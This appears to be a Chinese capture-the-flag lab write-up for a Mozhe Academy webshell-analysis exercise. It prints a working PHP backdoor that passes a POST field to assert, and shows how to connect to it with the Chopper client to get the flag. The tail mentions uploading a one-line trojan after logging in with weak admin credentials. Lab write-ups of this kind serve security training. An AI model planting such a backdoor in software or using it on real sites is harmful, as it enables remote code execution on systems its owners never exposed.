首先打开题目的网址,发现可以下载网站的源码,我们把网站的源码下载下来,用seay源代码审计系统找一下网站的漏洞
发现一处后门漏洞
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>
打开菜刀链接
http://IP地址/www/index.php?post=assert 链接密码 assert 即可获取key
首先打开题目的网址,发现可以下载网站的源码,我们把网站的源码下载下来,用seay源代码审计系统找一下网站的漏洞
发现一处后门漏洞
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>
打开菜刀链接
http://IP地址/www/index.php?post=assert 链接密码 assert 即可获取key
首先打开题目的网址,发现可以下载网站的源码,我们把网站的源码下载下来,用seay源代码审计系统找一下网站的漏洞 发...
靶场地址:https://www.mozhe.cn/bug/detail/RDBTOWFKOTJIODJRWlRw...
靶场地址:https://www.mozhe.cn/bug/detail/S3FBSGhXYlU2a09ybG83...
靶场地址:https://www.mozhe.cn/bug/detail/ZVNlS096cEV0WHZsTzdK...
靶场地址:https://www.mozhe.cn/bug/detail/L3dtcFZpT0lXbVMrRW1G...
靶场地址:https://www.mozhe.cn/bug/detail/TzRsdjFSYW9HQlA2OFdG...
验证上传点是否可以上传一句话木马image.pngimage.pngimage.pngimage.png 验证是否...
后台登录密码为弱口令 admin admin 进入后台 添加文章,上传一句话木马图片。记住返回的路径 在当前数...
靶场地址:https://www.mozhe.cn/bug/detail/MGt2VGdsK093TkdtcURB...
靶场地址:https://www.mozhe.cn/bug/detail/aVJuL2J4YVhUQkVxZi9x...
本文标题:墨者学院 - WebShell代码分析溯源(第2题)
本文链接:https://www.haomeiwen.com/subject/bivqoftx.html
网友评论